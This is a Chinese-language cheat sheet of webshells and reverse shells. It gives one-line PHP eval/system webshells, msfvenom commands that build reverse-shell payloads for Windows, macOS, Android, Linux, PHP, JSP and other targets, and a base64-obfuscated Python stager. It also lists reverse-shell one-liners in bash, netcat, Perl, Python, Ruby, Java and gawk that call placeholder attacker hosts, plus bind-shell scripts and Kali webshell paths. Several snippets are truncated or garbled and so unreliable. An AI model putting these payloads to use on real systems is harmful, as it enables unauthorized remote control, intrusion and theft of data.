Webshell
一句话木马
PHP
# 运行PHP命令
# 文件名:shell.php
# 利用方式:http://example.com/shell.php?cmd=phpinfo();
<?php eval($_REQUEST[\'cmd\']);?>
# 运行系统命令
# 文件名:shell2.php
# 利用方式:http://example.com/shell2.php?lalala=whoami
<?php system($_REQUEST[\'lalala\']);?>
反弹Shell生成
Windows
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b \'\x00\x0a\xff\' -i 3 -f exe -o payload.exe
Mac OS
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.macho
Android
//需要签名
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk
Powershell
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
Linux
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o payload.elf
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo \'<?php \' | tr -d \'\n\' > shell.php && pbpaste >> shell.php
ASPX
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx
JSP
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw - o payload.war
NodeJS
msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.js
Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.py
生成编码后的文件:
import base64;exec(base64.b64decode(\'aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMC4wLjAuMCcsMjMzMykpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YoNDA5NikKd2hpbGUgbGVuKGQpIT1sOgoJZCs9cy5yZWN2KDQwOTYpCmV4ZWMoZCx7J3MnOnN9KQo=\'))
Base64解码后:
import socket,struct
s=socket.socket(2,1)
s.connect((\'x.x.x.x\',2333))
l=struct.unpack(\'>I\',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
d+=s.recv(4096)
exec(d,{\'s\':s})
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.pl
Ruby
msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb
Lua
msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.lua
Windows Shellcode
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c
Linux Shellcode
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c
Mac Shellcode
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c
自动化Payload生成工具
https://github.com/Screetsec/TheFatRat
常用反弹Shell
Bash Reverse Shell
exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done
# or:
while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
socat Reverse Shell
socat tcp:ip:port exec:\'bash -i\' ,pty,stderr,setsid,sigint,sane &
Golang Reverse Shell
echo \'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;http://cmd.Run();}\'>/tmp/sh.go&&go run /tmp/sh.go
PHP Reverse Shell
php -r \'$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");\'
# (Assumes TCP uses file descriptor 3. If it doesn\'t work, try 4,5, or 6)
<?php exec("/bin/bash -c \'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&1\'");?>
<?=$x=explode(\'~\',base64_decode(substr(getallheaders()[\'x\'],1)));@$x[0]($x[1]);
<? php error_reporting(0); $ip = \'x.x.x.x\'; $port = 53; if (($f = \'stream_socket_client\') && is_callable($f)) { {$port}"); $s_type = \'stream\'; } if (!$s && ($f = \'fsockopen\') && is_callable($f)) { $s = $f($ip, $port); $s_ strlen($b)); break; case \'socket\': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS[\'msgsock\'] = $s; $GLOBALS[\'msgsock_type\'] = $s_type; if (extension_loaded(\'s >
<?php
$sock=fsockopen("xx.xx.xx.xx",xx);exec("/bin/sh -i <&3 >&3 2>&3");
?>
Netcat Reverse Shell
nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
Another which works well for OpenBSD netcat rather than GNU nc:
mkfifo /tmp/lol;nc ATTACKER-IP PORT 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol
Node.js Reverse Shell
require(\'child_process\').exec(\'bash -i >& /dev/tcp/10.0.0.1/80 0>&1\');
Telnet Reverse Shell
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
Perl Reverse Shell
perl -e \'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'
Perl Windows Reverse Shell
perl -MIO -e \'$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\'
perl -e \'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'
Ruby Reverse Shell
ruby -rsocket -e\'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)\'
Java Reverse Shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Python Reverse Shell
python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'
import socket,struct,time
for x in range(10):
try:
s=socket.socket(2,socket.SOCK_STREAM)
s.connect((\'x.x.x.x\',xx))
break
except:
time.sleep(5) l=struct.unpack(\'>I\',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
d+=s.recv(l-len(d))
exec(d,{\'s\':s})
python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect((\'x.x.x.x\',2333))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"
Bind Shell
关于交互式正向连接shell,几点需要注意的地方:
-
不管在linux还是windows下,想要做到交互式,只能开启一个Shell。不能够每次接收到命令就再开启一个新的shell进程,然后执行。
-
Windows下cmd.exe /K参数是保持cmd不结束,/c参数是执行完后就结束,注意区别。
Windows版本
from socket import *
import subprocess
import os, threading
def send(talk, proc):
import time
while True:
msg = proc.stdout.readline()
talk.send(msg)
if __name__ == "__main__":
server=socket(AF_INET,SOCK_STREAM)
server.bind((\'0.0.0.0\',23333))
server.listen(5)
print \'waiting for connect\'
talk, addr = server.accept()
print \'connect from\',addr
proc = subprocess.Popen(\'cmd.exe /K\', stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
t = threading.Thread(target = send, args = (talk, proc))
t.setDaemon(True)
t.start()
while True:
cmd=talk.recv(1024)
proc.stdin.write(cmd)
proc.stdin.flush()
server.close()
Linux版本
from socket import *
mport subprocess
mport os, threading, sys, time
f __name__ == "__main__":
erver=socket(AF_INET,SOCK_STREAM)
erver.bind((\'0.0.0.0\',11))
erver.listen(5)
rint \'waiting for connect\'
alk, addr = server.accept()
rint \'connect from\',addr
roc = subprocess.Popen(["/bin/sh","-i"],stdin=talk,stdout=talk, stderr=talk, shell=True)
执行后主动连接即可
Gawk Reverse Shell
gawk \'BEGIN {P=4444;S="> ";H="192.168.1.100";V="/inet/tcp/0/"H"/"P;while(1){do{printf S|&V;V|&getline c;if(c){while((c|&getline)>0)print $0|&V;close(c)}}while(c!="exit")close(V)}}\'
#!/usr/bin/gawk -f
BEGIN {
Port = 8080
Prompt = "bkd> "
Service = "/inet/tcp/" Port "/0/0"
while (1) {
do {
printf Prompt |& Service
Service |& getline cmd
if (cmd) {
while ((cmd |& getline) > 0)
print $0 |& Service
close(cmd)
}
} while (cmd != "exit")
close(Service)
}
}
Kali Web Shells
以下脚本保存在Kali Linux的/usr/share/webshell
中,只有在可以上传、注入、传输到目标机的情况下才可以使用。
Kali PHP Web Shells
php-reverse-shell.php
Pen Test Monkey – PHP Reverse Shell
php-findsock-shell.php
& findsock.c
Pen Test Monkey, Findsock Shell. Build gcc -o findsock findsock.c
(be mindfull of the target servers architecture), execute with netcat not a browser nc -v target 80
simple-backdoor.php
PHP backdoor, usefull for CMD execution if upload / code injection is possible, usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
php-backdoor.php
Larger PHP shell, with a text input box for command execution.
Kali Perl Reverse Shell
perl-reverse-shell.pl
Pen Test Monkey – Perl Reverse Shell
perlcmd.cgi
Pen Test Monkey, Perl Shell. Usage: http://target.com/perlcmd.cgi?cat /etc/passwd
Kali Cold Fusion Shell
cfexec.cfm
Cold Fusion Shell – aka CFM Shell
Kali ASP Shell
Classic ASP Reverse Shell + CMD shells: /usr/share/webshells/asp/
Kali ASPX Shells
ASP.NET reverse shells within Kali: /usr/share/webshells/aspx/
Kali JSP Reverse Shell
Kali JSP Reverse Shell: /usr/share/webshells/jsp/jsp-reverse.jsp